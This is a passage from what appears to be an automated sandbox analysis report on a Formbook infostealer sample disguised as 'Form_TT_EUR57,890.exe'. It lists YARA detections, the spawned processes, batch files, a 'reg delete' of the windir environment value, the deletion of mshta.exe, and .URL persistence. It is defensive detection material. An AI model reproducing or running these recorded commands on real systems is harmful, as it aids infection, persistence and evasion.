          Source: C:\Windows\explorer.exeSection loaded: netapi32.dll
          Source: Form_TT_EUR57,890.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
          Source: 4.0.logagent.exe.10410000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.logagent.exe.10410000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.logagent.exe.10410000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.logagent.exe.10410000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 29.2.secinit.exe.10410000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 29.2.secinit.exe.10410000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 26.0.mshta.exe.10410000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 26.0.mshta.exe.10410000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.logagent.exe.10410000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.logagent.exe.10410000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 26.2.mshta.exe.10410000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 26.2.mshta.exe.10410000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 29.0.secinit.exe.10410000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 29.0.secinit.exe.10410000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 26.0.mshta.exe.10410000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 26.0.mshta.exe.10410000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 29.0.secinit.exe.10410000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 29.0.secinit.exe.10410000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 29.2.secinit.exe.10410000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 29.2.secinit.exe.10410000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 26.2.mshta.exe.10410000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 26.2.mshta.exe.10410000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.logagent.exe.10410000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.logagent.exe.10410000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000003.437045703.0000000002DE4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: 0000001D.00000000.493724351.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001D.00000000.493724351.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001C.00000002.861918517.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001C.00000002.861918517.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000003.362637084.0000000002DC4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: 0000001A.00000002.495868043.0000000002910000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001A.00000002.495868043.0000000002910000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001A.00000002.496343429.0000000002C80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001A.00000002.496343429.0000000002C80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001C.00000002.863420934.0000000002DD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001C.00000002.863420934.0000000002DD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000003.437534855.0000000002DA8000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: 0000001A.00000000.467594845.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001A.00000000.467594845.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001D.00000002.505021347.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001D.00000002.505021347.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.513499123.0000000004600000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.513499123.0000000004600000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000003.362921408.0000000002D88000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: 0000001C.00000002.862165299.0000000000CB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001C.00000002.862165299.0000000000CB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001A.00000002.497909086.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001A.00000002.497909086.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000023.00000002.512339844.0000000002940000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000023.00000002.512339844.0000000002940000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.380848795.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.380848795.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.512824544.0000000002B50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.512824544.0000000002B50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000003.465981030.0000000002DA8000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: 00000004.00000002.515478166.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.515478166.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000003.465812677.0000000002DE4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: C:\Users\Public\Libraries\kjalhdF.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: classification engineClassification label: mal100.troj.evad.winEXE@32/10@29/10
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90Jump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6344:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2424:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6192:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6228:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5768:120:WilError_01
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: Form_TT_EUR57,890.exeReversingLabs: Detection: 19%
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeFile read: C:\Users\user\Desktop\Form_TT_EUR57,890.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Form_TT_EUR57,890.exe 'C:\Users\user\Desktop\Form_TT_EUR57,890.exe'
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeProcess created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
          Source: C:\Windows\SysWOW64\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe 'C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe 'C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe'
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\System32\mshta.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeProcess created: C:\Windows\SysWOW64\secinit.exe C:\Windows\System32\secinit.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\mshta.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeProcess created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
          Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe 'C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\System32\mshta.exe
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeProcess created: C:\Windows\SysWOW64\secinit.exe C:\Windows\System32\secinit.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\mshta.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03C036F1-A186-11D0-824A-00AA005B4383}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000008.00000000.411546423.0000000007BA0000.00000002.00000001.sdmp
          Source: Binary string: mshta.pdbGCTL source: rundll32.exe, 0000001C.00000002.865904880.00000000051C7000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: logagent.exe, 00000004.00000002.513978427.0000000004A5F000.00000040.00000001.sdmp, mshta.exe, 0000001A.00000003.468583820.0000000002D50000.00000004.00000001.sdmp, rundll32.exe, 0000001C.00000002.863838057.0000000004C90000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: logagent.exe, mshta.exe, rundll32.exe, 0000001C.00000002.863838057.0000000004C90000.00000040.00000001.sdmp
          Source: Binary string: rundll32.pdb source: mshta.exe, 0000001A.00000002.496580927.0000000002D00000.00000040.00000001.sdmp
          Source: Binary string: rundll32.pdbGCTL source: mshta.exe, 0000001A.00000002.496580927.0000000002D00000.00000040.00000001.sdmp
